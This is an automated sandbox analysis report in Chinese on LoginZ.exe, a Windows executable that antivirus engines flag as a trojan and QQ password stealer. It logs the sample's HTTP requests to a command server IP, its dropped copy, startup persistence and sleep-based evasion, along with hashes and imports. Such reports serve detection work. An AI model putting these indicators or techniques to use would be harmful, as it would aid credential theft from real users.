魔盾安全分析报告
| 分析类型 | 开始时间 | 结束时间 | 持续时间 | 分析引擎版本 |
|---|---|---|---|---|
| FILE | 2017-03-16 21:37:17 | 2017-03-16 21:39:43 | 146 秒 | 1.4-Maldun |
| 虚拟机机器名 | 标签 | 虚拟机管理 | 开机时间 | 关机时间 |
|---|---|---|---|---|
| win7-sp1-x64-hpdapp03-1 | win7-sp1-x64-hpdapp03-1 | KVM | 2017-03-16 21:37:23 | 2017-03-16 21:39:42 |
| 魔盾分数 |
|---|
10.0恶意的 |
文件详细信息
| 文件名 | LoginZ.exe |
|---|---|
| 文件大小 | 2805760 字节 |
| 文件类型 | PE32 executable (GUI) Intel 80386, for MS Windows |
| CRC32 | 2BB554EA |
| MD5 | 66229fcde650f8671f0058bf9962c358 |
| SHA1 | 45713d1ae867d9fe2b3727c31513e426da1cf724 |
| SHA256 | 1e92d42bc6fb2fceaac740e4e11c47091efbdfa86ae69d666eccb640b7979476 |
| SHA512 | 82c09cdc063a80e7dce1f93aea9931c1df8ec2dab3933ff7fc230db2c3da159cfcc0060170991126b85446a1af0f61924ae97e5268a2ad5f5f068606d6924b6f |
| Ssdeep | 24576:4yacmnB3Z2ihx4o1r/HtTl6tCA8XTTv8/ib+G1RzV1E6UnFXlJYMoZsgUlFNaEeu:4wWnp/yttTEaRYtsgUhK1HdoMY5/mo |
| PEiD | 无匹配 |
| Yara |
|
| VirusTotal |
VirusTotal链接 VirusTotal扫描时间: 2017-03-16 13:36:22 扫描结果: 24/62 |
特征
在加密调用中发现至少一个IP地址,域名,或文件名
ioc: http://www.super-ec.cnhttp
ioc: www.eyybc.com/forum-17-1.html/forum-12-1.html/memcp.php/ip.asp/time.asp/gonggao.txt/ec-user6.php/ec-bd.php/ec-jh.php
ioc: http://www.super-ec.cn
从文件自身的二进制镜像中读取数据
self_read: process: LoginZ.exe, pid: 2532, offset: 0x00000000, length: 0x002ad000
self_read: process: msdtcws.exe, pid: 2612, offset: 0x00000000, length: 0x002ad000
投放出一个二进制文件并执行它
binary: C:\Program Files\Player\msdtcws.exe
HTTP数据流中包含可疑的恶意软件数据
ip_hostname: HTTP connection was made to an IP address rather than domain name
suspicious_request: http://121.41.83.121/ver.txt
suspicious_request: http://121.41.83.121/ip.asp
suspicious_request: http://121.41.83.121/bbs/cj_id.asp?name=o11458
suspicious_request: http://121.41.83.121/bbs/cj_pasp.asp?zh=o11458
suspicious_request: http://121.41.83.121/bbs/cj_xinxiasp.asp?zh=o11458
suspicious_request: http://121.41.83.121/bbs/o11458/p2.asp?s=AF23CCDE689BAC4434C89C1AB42D6557EFA809A9D3ECA2D77DC38287E133E0598AF812D20DFF6F8805BE594540EAB03D9BABE2CE22604BA1910E12BD9224C1CC8FA59BB32ADE684F2CBC261B036F8236828DD98C6B7A81A21689BDCBE8738E526C5410F80B0D39ADA41C93ED7031B451310777EE92D32C665B7DC920904263F5F7658B6273A9977C1EBB&ss=<.>
suspicious_request: http://121.41.83.121/1076956519/p2.asp?ml=DA2AC8E2&mls=7CD43609E659138EA644C64DF56E66349EFA369629
suspicious_request: http://121.41.83.121/swfurl.txt
suspicious_request: http://121.41.83.121/bbs/o11458/do.txt
发起了一些HTTP请求
url: http://121.41.83.121/ver.txt
url: http://121.41.83.121/ip.asp
url: http://121.41.83.121/bbs/cj_id.asp?name=o11458
url: http://121.41.83.121/bbs/cj_pasp.asp?zh=o11458
url: http://121.41.83.121/bbs/cj_xinxiasp.asp?zh=o11458
url: http://121.41.83.121/bbs/o11458/p2.asp?s=AF23CCDE689BAC4434C89C1AB42D6557EFA809A9D3ECA2D77DC38287E133E0598AF812D20DFF6F8805BE594540EAB03D9BABE2CE22604BA1910E12BD9224C1CC8FA59BB32ADE684F2CBC261B036F8236828DD98C6B7A81A21689BDCBE8738E526C5410F80B0D39ADA41C93ED7031B451310777EE92D32C665B7DC920904263F5F7658B6273A9977C1EBB&ss=<.>
url: http://121.41.83.121/1076956519/p2.asp?ml=DA2AC8E2&mls=7CD43609E659138EA644C64DF56E66349EFA369629
url: http://121.41.83.121/swfurl.txt
url: http://121.41.83.121/bbs/o11458/do.txt
通过进程尝试长时间延迟分析任务
Process: msdtcws.exe tried to sleep 125 seconds, actually delayed analysis time by 0 seconds
网络活动包含了一个以上的不重复的用户代理
Process: LoginZ.exe
User-Agent: E.WinInet 1.0
Process: msdtcws.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
将自己装载到Windows开机自动启动项目
file: C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LoginZ.exe
文件已被至少十个VirusTotal上的反病毒引擎检测为病毒
CAT-QuickHeal: Risktool.Flystudio.17322
Invincea: trojan.win32.startpage.agm
F-Prot: W32/OnlineGames.HH.gen!Eldorado
Symantec: ML.Attribute.HighConfidence
GData: Win32.Trojan.FlyStudio.F
Kaspersky: Trojan.Win32.Agent.nezdjg
NANO-Antivirus: Trojan.Win32.Agent.elzutg
Tencent: Win32.Trojan.Agent.Wmso
Comodo: TrojWare.Win32.Agent.OSCF
DrWeb: Trojan.MulDrop7.20804
McAfee-GW-Edition: BehavesLike.Win32.Generic.vh
SentinelOne: static engine - malicious
Cyren: W32/OnlineGames.HH.gen!Eldorado
Jiangmin: Trojan.Agent.atlz
Antiy-AVL: Trojan/Win32.Agent
Endgame: malicious (high confidence)
ZoneAlarm: Trojan.Win32.Agent.nezdjg
ESET-NOD32: a variant of Win32/QQWare.AA
Rising: Stealer.QQpass!1.648F (classic)
Fortinet: W32/QQPass.ELG!tr.pws
AVG: Agent5.BIOL
Panda: Trj/GdSda.A
CrowdStrike: malicious_confidence_100% (D)
Qihoo-360: HEUR/QVM07.1.0000.Malware.Gen
尝试修改代理设置
生成一个自己的复制文件
copy: C:\Program Files\Player\msdtcws.exe
copy: C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LoginZ.exe
运行截图
网络分析
访问主机记录
| 直接访问 | IP地址 | 国家名 |
|---|---|---|
| 是 | 121.41.83.121 | China |
TCP连接
| IP地址 | 端口 |
|---|---|
| 121.41.83.121 | 80 |
| 121.41.83.121 | 80 |
HTTP请求
| URL | HTTP数据 |
|---|---|
| http://121.41.83.121/ver.txt | GET /ver.txt HTTP/1.1 Accept: */* Referer: http://121.41.83.121/ver.txt Accept-Language: zh-cn Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) Host: 121.41.83.121 Cache-Control: no-cache |
| http://121.41.83.121/ip.asp | GET /ip.asp HTTP/1.1 Accept: */* Referer: http://121.41.83.121/ip.asp Accept-Language: zh-cn Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) Host: 121.41.83.121 Cache-Control: no-cache |
| http://121.41.83.121/bbs/cj_id.asp?name=o11458 | GET /bbs/cj_id.asp?name=o11458 HTTP/1.1 Accept: */* Referer: http://121.41.83.121/bbs/cj_id.asp?name=o11458 Accept-Language: zh-cn Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) Host: 121.41.83.121 Cache-Control: no-cache Cookie: ASPSESSIONIDCQDQCTQT=IKJHNHBBOBAFDGBBAGNJNDBO |
| http://121.41.83.121/bbs/cj_pasp.asp?zh=o11458 | GET /bbs/cj_pasp.asp?zh=o11458 HTTP/1.1 Accept: */* Referer: http://121.41.83.121/bbs/cj_pasp.asp?zh=o11458 Accept-Language: zh-cn Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) Host: 121.41.83.121 Cache-Control: no-cache Cookie: ASPSESSIONIDCQDQCTQT=IKJHNHBBOBAFDGBBAGNJNDBO |
| http://121.41.83.121/bbs/cj_xinxiasp.asp?zh=o11458 | GET /bbs/cj_xinxiasp.asp?zh=o11458 HTTP/1.1 Accept: */* Referer: http://121.41.83.121/bbs/cj_xinxiasp.asp?zh=o11458 Accept-Language: zh-cn Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) Host: 121.41.83.121 Cache-Control: no-cache Cookie: ASPSESSIONIDCQDQCTQT=IKJHNHBBOBAFDGBBAGNJNDBO |
| http://121.41.83.121/bbs/o11458/p2.asp?s=AF23CCDE689BAC4434C89C1AB42D6557EFA809A9D3ECA2D77DC38287E133E0598AF812D20DFF6F8805BE594540EAB03D9BABE2CE22604BA1910E12BD9224C1CC8FA59BB32ADE684F2CBC261B036F8236828DD98C6B7A81A21689BDCBE8738E526C5410F80B0D39ADA41C93ED7031B451310777EE92D32C665B7DC920904263F5F7658B6273A9977C1EBB&ss=<.> | GET /bbs/o11458/p2.asp?s=AF23CCDE689BAC4434C89C1AB42D6557EFA809A9D3ECA2D77DC38287E133E0598AF812D20DFF6F8805BE594540EAB03D9BABE2CE22604BA1910E12BD9224C1CC8FA59BB32ADE684F2CBC261B036F8236828DD98C6B7A81A21689BDCBE8738E526C5410F80B0D39ADA41C93ED7031B451310777EE92D32C665B7DC920904263F5F7658B6273A9977C1EBB&ss=<.> HTTP/1.1 Accept: */* Referer: http://121.41.83.121/bbs/o11458\p2.asp?s=AF23CCDE689BAC4434C89C1AB42D6557EFA809A9D3ECA2D77DC38287E133E0598AF812D20DFF6F8805BE594540EAB03D9BABE2CE22604BA1910E12BD9224C1CC8FA59BB32ADE684F2CBC261B036F8236828DD98C6B7A81A21689BDCBE8738E526C5410F80B0D39ADA41C93ED7031B451310777EE92D32C665B7DC920904263F5F7658B6273A9977C1EBB&ss=<.> Accept-Language: zh-cn Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) Host: 121.41.83.121 Cache-Control: no-cache Cookie: ASPSESSIONIDCQDQCTQT=IKJHNHBBOBAFDGBBAGNJNDBO |
| http://121.41.83.121/1076956519/p2.asp?ml=DA2AC8E2&mls=7CD43609E659138EA644C64DF56E66349EFA369629 | GET /1076956519/p2.asp?ml=DA2AC8E2&mls=7CD43609E659138EA644C64DF56E66349EFA369629 HTTP/1.1 Accept: */* Referer: http://121.41.83.121/1076956519\p2.asp?ml=DA2AC8E2&mls=7CD43609E659138EA644C64DF56E66349EFA369629 Accept-Language: zh-cn Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) Host: 121.41.83.121 Cache-Control: no-cache Cookie: ASPSESSIONIDCQDQCTQT=IKJHNHBBOBAFDGBBAGNJNDBO |
| http://121.41.83.121/swfurl.txt | GET /swfurl.txt HTTP/1.1 Accept: */* Referer: http://121.41.83.121/swfurl.txt Accept-Language: zh-cn Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) Host: 121.41.83.121 Cache-Control: no-cache Cookie: ASPSESSIONIDCQDQCTQT=IKJHNHBBOBAFDGBBAGNJNDBO |
| http://121.41.83.121/bbs/o11458/do.txt | GET /bbs/o11458/do.txt HTTP/1.1 Accept: */* Referer: http://121.41.83.121/bbs/o11458/do.txt Accept-Language: zh-cn Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) Host: 121.41.83.121 Cache-Control: no-cache Cookie: ASPSESSIONIDCQDQCTQT=IKJHNHBBOBAFDGBBAGNJNDBO |
静态分析
PE 信息
| 初始地址 | 0x00400000 |
|---|---|
| 入口地址 | 0x005357f0 |
| 声明校验值 | 0x00000000 |
| 实际校验值 | 0x002bb182 |
| 最低操作系统版本要求 | 4.0 |
| 编译时间 | 2017-02-09 16:13:24 |
| 载入哈希 | a73b0be0fb7ecf9b208d71b4c7b3255c |
| 图标 |  |
| 图标精确哈希值 | faf73fb49142c5105af36402865d6548 |
| 图标相似性哈希值 | c387a5dbc4b03f3f1cce95edb2ace2f1 |
PE数据组成
| 名称 | 虚拟地址 | 虚拟大小 | 原始数据大小 | 特征 | 熵(Entropy) |
|---|---|---|---|---|---|
| .text | 0x00001000 | 0x0015dbd2 | 0x0015e000 | IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ | 6.58 |
| .rdata | 0x0015f000 | 0x000da244 | 0x000db000 | IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ | 6.37 |
| .data | 0x0023a000 | 0x00073f6a | 0x00023000 | IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE | 5.34 |
| .rsrc | 0x002ae000 | 0x0004fb28 | 0x00050000 | IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ | 5.21 |
资源
| 名称 | 偏移量 | 大小 | 语言 | 子语言 | 熵(Entropy) | 文件类型 |
|---|---|---|---|---|---|---|
| TEXTINCLUDE | 0x002aede0 | 0x00000151 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 5.25 | C source, ASCII text, with CRLF line terminators |
| TEXTINCLUDE | 0x002aede0 | 0x00000151 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 5.25 | C source, ASCII text, with CRLF line terminators |
| TEXTINCLUDE | 0x002aede0 | 0x00000151 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 5.25 | C source, ASCII text, with CRLF line terminators |
| RT_CURSOR | 0x002af2d0 | 0x000000b4 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 2.74 | data |
| RT_CURSOR | 0x002af2d0 | 0x000000b4 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 2.74 | data |
| RT_CURSOR | 0x002af2d0 | 0x000000b4 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 2.74 | data |
| RT_CURSOR | 0x002af2d0 | 0x000000b4 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 2.74 | data |
| RT_BITMAP | 0x002b0b44 | 0x00000144 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 2.88 | data |
| RT_BITMAP | 0x002b0b44 | 0x00000144 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 2.88 | data |
| RT_BITMAP | 0x002b0b44 | 0x00000144 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 2.88 | data |
| RT_BITMAP | 0x002b0b44 | 0x00000144 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 2.88 | data |
| RT_BITMAP | 0x002b0b44 | 0x00000144 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 2.88 | data |
| RT_BITMAP | 0x002b0b44 | 0x00000144 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 2.88 | data |
| RT_BITMAP | 0x002b0b44 | 0x00000144 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 2.88 | data |
| RT_BITMAP | 0x002b0b44 | 0x00000144 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 2.88 | data |
| RT_BITMAP | 0x002b0b44 | 0x00000144 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 2.88 | data |
| RT_BITMAP | 0x002b0b44 | 0x00000144 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 2.88 | data |
| RT_BITMAP | 0x002b0b44 | 0x00000144 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 2.88 | data |
| RT_BITMAP | 0x002b0b44 | 0x00000144 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 2.88 | data |
| RT_BITMAP | 0x002b0b44 | 0x00000144 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 2.88 | data |
| RT_BITMAP | 0x002b0b44 | 0x00000144 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 2.88 | data |
| RT_BITMAP | 0x002b0b44 | 0x00000144 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 2.88 | data |
| RT_ICON | 0x002fb750 | 0x00000468 | LANG_NEUTRAL | SUBLANG_NEUTRAL | 5.74 | GLS_BINARY_LSB_FIRST |
| RT_ICON | 0x002fb750 | 0x00000468 | LANG_NEUTRAL | SUBLANG_NEUTRAL | 5.74 | GLS_BINARY_LSB_FIRST |
| RT_ICON | 0x002fb750 | 0x00000468 | LANG_NEUTRAL | SUBLANG_NEUTRAL | 5.74 | GLS_BINARY_LSB_FIRST |
| RT_ICON | 0x002fb750 | 0x00000468 | LANG_NEUTRAL | SUBLANG_NEUTRAL | 5.74 | GLS_BINARY_LSB_FIRST |
| RT_ICON | 0x002fb750 | 0x00000468 | LANG_NEUTRAL | SUBLANG_NEUTRAL | 5.74 | GLS_BINARY_LSB_FIRST |
| RT_ICON | 0x002fb750 | 0x00000468 | LANG_NEUTRAL | SUBLANG_NEUTRAL | 5.74 | GLS_BINARY_LSB_FIRST |
| RT_ICON | 0x002fb750 | 0x00000468 | LANG_NEUTRAL | SUBLANG_NEUTRAL | 5.74 | GLS_BINARY_LSB_FIRST |
| RT_ICON | 0x002fb750 | 0x00000468 | LANG_NEUTRAL | SUBLANG_NEUTRAL | 5.74 | GLS_BINARY_LSB_FIRST |
| RT_ICON | 0x002fb750 | 0x00000468 | LANG_NEUTRAL | SUBLANG_NEUTRAL | 5.74 | GLS_BINARY_LSB_FIRST |
| RT_ICON | 0x002fb750 | 0x00000468 | LANG_NEUTRAL | SUBLANG_NEUTRAL | 5.74 | GLS_BINARY_LSB_FIRST |
| RT_ICON | 0x002fb750 | 0x00000468 | LANG_NEUTRAL | SUBLANG_NEUTRAL | 5.74 | GLS_BINARY_LSB_FIRST |
| RT_ICON | 0x002fb750 | 0x00000468 | LANG_NEUTRAL | SUBLANG_NEUTRAL | 5.74 | GLS_BINARY_LSB_FIRST |
| RT_ICON | 0x002fb750 | 0x00000468 | LANG_NEUTRAL | SUBLANG_NEUTRAL | 5.74 | GLS_BINARY_LSB_FIRST |
| RT_ICON | 0x002fb750 | 0x00000468 | LANG_NEUTRAL | SUBLANG_NEUTRAL | 5.74 | GLS_BINARY_LSB_FIRST |
| RT_MENU | 0x002fbbc4 | 0x00000284 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.28 | data |
| RT_MENU | 0x002fbbc4 | 0x00000284 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 4.28 | data |
| RT_DIALOG | 0x002fce0c | 0x0000018c | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 3.74 | data |
| RT_DIALOG | 0x002fce0c | 0x0000018c | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 3.74 | data |
| RT_DIALOG | 0x002fce0c | 0x0000018c | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 3.74 | data |
| RT_DIALOG | 0x002fce0c | 0x0000018c | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 3.74 | data |
| RT_DIALOG | 0x002fce0c | 0x0000018c | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 3.74 | data |
| RT_DIALOG | 0x002fce0c | 0x0000018c | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 3.74 | data |
| RT_DIALOG | 0x002fce0c | 0x0000018c | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 3.74 | data |
| RT_DIALOG | 0x002fce0c | 0x0000018c | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 3.74 | data |
| RT_DIALOG | 0x002fce0c | 0x0000018c | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 3.74 | data |
| RT_DIALOG | 0x002fce0c | 0x0000018c | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 3.74 | data |
| RT_STRING | 0x002fd854 | 0x00000024 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 0.90 | data |
| RT_STRING | 0x002fd854 | 0x00000024 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 0.90 | data |
| RT_STRING | 0x002fd854 | 0x00000024 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 0.90 | data |
| RT_STRING | 0x002fd854 | 0x00000024 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 0.90 | data |
| RT_STRING | 0x002fd854 | 0x00000024 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 0.90 | data |
| RT_STRING | 0x002fd854 | 0x00000024 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 0.90 | data |
| RT_STRING | 0x002fd854 | 0x00000024 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 0.90 | data |
| RT_STRING | 0x002fd854 | 0x00000024 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 0.90 | data |
| RT_STRING | 0x002fd854 | 0x00000024 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 0.90 | data |
| RT_STRING | 0x002fd854 | 0x00000024 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 0.90 | data |
| RT_STRING | 0x002fd854 | 0x00000024 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 0.90 | data |
| RT_GROUP_CURSOR | 0x002fd8a0 | 0x00000022 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 2.25 | MS Windows cursor resource - 2 icons, 32x256, hotspot @1x1 |
| RT_GROUP_CURSOR | 0x002fd8a0 | 0x00000022 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 2.25 | MS Windows cursor resource - 2 icons, 32x256, hotspot @1x1 |
| RT_GROUP_CURSOR | 0x002fd8a0 | 0x00000022 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 2.25 | MS Windows cursor resource - 2 icons, 32x256, hotspot @1x1 |
| RT_GROUP_ICON | 0x002fd944 | 0x00000014 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 2.02 | MS Windows icon resource - 1 icon, 16x16, 16 colors |
| RT_GROUP_ICON | 0x002fd944 | 0x00000014 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 2.02 | MS Windows icon resource - 1 icon, 16x16, 16 colors |
| RT_GROUP_ICON | 0x002fd944 | 0x00000014 | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | 2.02 | MS Windows icon resource - 1 icon, 16x16, 16 colors |
| RT_MANIFEST | 0x002fd958 | 0x000001cd | LANG_NEUTRAL | SUBLANG_NEUTRAL | 5.08 | XML 1.0 document, ASCII text, with very long lines, with no line terminators |
导入
库 WINMM.dll:
• 0x55f7d0 - midiStreamOut
• 0x55f7d4 - midiOutPrepareHeader
• 0x55f7d8 - midiStreamProperty
• 0x55f7dc - midiStreamOpen
• 0x55f7e0 - midiOutUnprepareHeader
• 0x55f7e4 - waveOutOpen
• 0x55f7e8 - waveOutRestart
• 0x55f7ec - mciSendStringA
• 0x55f7f0 - waveOutUnprepareHeader
• 0x55f7f4 - waveOutPrepareHeader
• 0x55f7f8 - waveOutWrite
• 0x55f7fc - waveOutPause
• 0x55f800 - waveOutReset
• 0x55f804 - waveOutClose
• 0x55f808 - midiStreamStop
• 0x55f80c - midiOutReset
• 0x55f810 - midiStreamClose
• 0x55f814 - midiStreamRestart
• 0x55f818 - waveOutGetNumDevs
库 WS2_32.dll:
• 0x55f830 - sendto
• 0x55f834 - socket
• 0x55f838 - htonl
• 0x55f83c - bind
• 0x55f840 - htons
• 0x55f844 - WSAAsyncSelect
• 0x55f848 - closesocket
• 0x55f84c - recvfrom
• 0x55f850 - select
• 0x55f854 - WSACleanup
• 0x55f858 - WSAStartup
• 0x55f85c - gethostbyname
• 0x55f860 - inet_ntoa
• 0x55f864 - inet_addr
• 0x55f868 - ioctlsocket
• 0x55f86c - connect
• 0x55f870 - recv
• 0x55f874 - listen
• 0x55f878 - getpeername
• 0x55f87c - accept
• 0x55f880 - __WSAFDIsSet
• 0x55f884 - ntohs
• 0x55f888 - gethostname
• 0x55f88c - getsockname
• 0x55f890 - send
• 0x55f894 - ntohl
库 VERSION.dll:
• 0x55f79c - VerLanguageNameA
库 RASAPI32.dll:
• 0x55f4dc - RasGetConnectStatusA
• 0x55f4e0 - RasHangUpA
库 KERNEL32.dll:
• 0x55f1b8 - SetLastError
• 0x55f1bc - GetTimeZoneInformation
• 0x55f1c0 - GetSystemDefaultLangID
• 0x55f1c4 - GetLocaleInfoA
• 0x55f1c8 - GetVersion
• 0x55f1cc - SetSystemPowerState
• 0x55f1d0 - WideCharToMultiByte
• 0x55f1d4 - GetTempFileNameA
• 0x55f1d8 - FileTimeToSystemTime
• 0x55f1dc - IsDBCSLeadByte
• 0x55f1e0 - MultiByteToWideChar
• 0x55f1e4 - lstrcmpiA
• 0x55f1e8 - lstrcpynA
• 0x55f1ec - UnmapViewOfFile
• 0x55f1f0 - MapViewOfFile
• 0x55f1f4 - CreateFileMappingA
• 0x55f1f8 - FlushViewOfFile
• 0x55f1fc - TerminateThread
• 0x55f200 - CreateMutexA
• 0x55f204 - ReleaseMutex
• 0x55f208 - SuspendThread
• 0x55f20c - GetStartupInfoA
• 0x55f210 - GetOEMCP
• 0x55f214 - GetCPInfo
• 0x55f218 - GetProcessVersion
• 0x55f21c - SetErrorMode
• 0x55f220 - GlobalFlags
• 0x55f224 - GetCurrentThread
• 0x55f228 - GetFileTime
• 0x55f22c - TlsGetValue
• 0x55f230 - LocalReAlloc
• 0x55f234 - TlsSetValue
• 0x55f238 - TlsFree
• 0x55f23c - GlobalHandle
• 0x55f240 - TlsAlloc
• 0x55f244 - LocalAlloc
• 0x55f248 - GlobalGetAtomNameA
• 0x55f24c - GlobalAddAtomA
• 0x55f250 - GlobalFindAtomA
• 0x55f254 - GlobalDeleteAtom
• 0x55f258 - GetThreadLocale
• 0x55f25c - SetEndOfFile
• 0x55f260 - UnlockFile
• 0x55f264 - LockFile
• 0x55f268 - FlushFileBuffers
• 0x55f26c - DuplicateHandle
• 0x55f270 - FileTimeToLocalFileTime
• 0x55f274 - FormatMessageA
• 0x55f278 - LocalFree
• 0x55f27c - InterlockedDecrement
• 0x55f280 - InterlockedIncrement
• 0x55f284 - GetSystemDirectoryA
• 0x55f288 - GetWindowsDirectoryA
• 0x55f28c - OpenProcess
• 0x55f290 - TerminateProcess
• 0x55f294 - GetCurrentProcess
• 0x55f298 - GetFileSize
• 0x55f29c - SetFilePointer
• 0x55f2a0 - CreateToolhelp32Snapshot
• 0x55f2a4 - Process32First
• 0x55f2a8 - Process32Next
• 0x55f2ac - CreateSemaphoreA
• 0x55f2b0 - ResumeThread
• 0x55f2b4 - ReleaseSemaphore
• 0x55f2b8 - EnterCriticalSection
• 0x55f2bc - LeaveCriticalSection
• 0x55f2c0 - GetProfileStringA
• 0x55f2c4 - WriteFile
• 0x55f2c8 - ReadFile
• 0x55f2cc - WaitForMultipleObjects
• 0x55f2d0 - CreateFileA
• 0x55f2d4 - SetEvent
• 0x55f2d8 - FindResourceA
• 0x55f2dc - LoadResource
• 0x55f2e0 - LockResource
• 0x55f2e4 - lstrlenW
• 0x55f2e8 - RemoveDirectoryA
• 0x55f2ec - GetModuleFileNameA
• 0x55f2f0 - GetCurrentThreadId
• 0x55f2f4 - ExitProcess
• 0x55f2f8 - GlobalSize
• 0x55f2fc - GlobalFree
• 0x55f300 - DeleteCriticalSection
• 0x55f304 - InitializeCriticalSection
• 0x55f308 - lstrcatA
• 0x55f30c - lstrlenA
• 0x55f310 - WinExec
• 0x55f314 - lstrcpyA
• 0x55f318 - FindNextFileA
• 0x55f31c - GlobalReAlloc
• 0x55f320 - HeapFree
• 0x55f324 - HeapReAlloc
• 0x55f328 - GetProcessHeap
• 0x55f32c - HeapAlloc
• 0x55f330 - GetUserDefaultLCID
• 0x55f334 - GetFullPathNameA
• 0x55f338 - FreeLibrary
• 0x55f33c - LoadLibraryA
• 0x55f340 - GetLastError
• 0x55f344 - GetVersionExA
• 0x55f348 - WritePrivateProfileStringA
• 0x55f34c - CreateThread
• 0x55f350 - CreateEventA
• 0x55f354 - Sleep
• 0x55f358 - ExpandEnvironmentStringsA
• 0x55f35c - GlobalAlloc
• 0x55f360 - GlobalLock
• 0x55f364 - GlobalUnlock
• 0x55f368 - GetTempPathA
• 0x55f36c - FindFirstFileA
• 0x55f370 - FindClose
• 0x55f374 - GetFileAttributesA
• 0x55f378 - MoveFileA
• 0x55f37c - DeleteFileA
• 0x55f380 - CopyFileA
• 0x55f384 - CreateDirectoryA
• 0x55f388 - SetCurrentDirectoryA
• 0x55f38c - GetVolumeInformationA
• 0x55f390 - GetModuleHandleA
• 0x55f394 - GetProcAddress
• 0x55f398 - MulDiv
• 0x55f39c - GetCommandLineA
• 0x55f3a0 - GetTickCount
• 0x55f3a4 - InterlockedExchange
• 0x55f3a8 - CreateProcessA
• 0x55f3ac - WaitForSingleObject
• 0x55f3b0 - CloseHandle
• 0x55f3b4 - RtlUnwind
• 0x55f3b8 - GetSystemTime
• 0x55f3bc - GetLocalTime
• 0x55f3c0 - RaiseException
• 0x55f3c4 - GetFileType
• 0x55f3c8 - HeapSize
• 0x55f3cc - GetACP
• 0x55f3d0 - SetStdHandle
• 0x55f3d4 - UnhandledExceptionFilter
• 0x55f3d8 - FreeEnvironmentStringsA
• 0x55f3dc - FreeEnvironmentStringsW
• 0x55f3e0 - GetEnvironmentStrings
• 0x55f3e4 - GetEnvironmentStringsW
• 0x55f3e8 - SetHandleCount
• 0x55f3ec - GetStdHandle
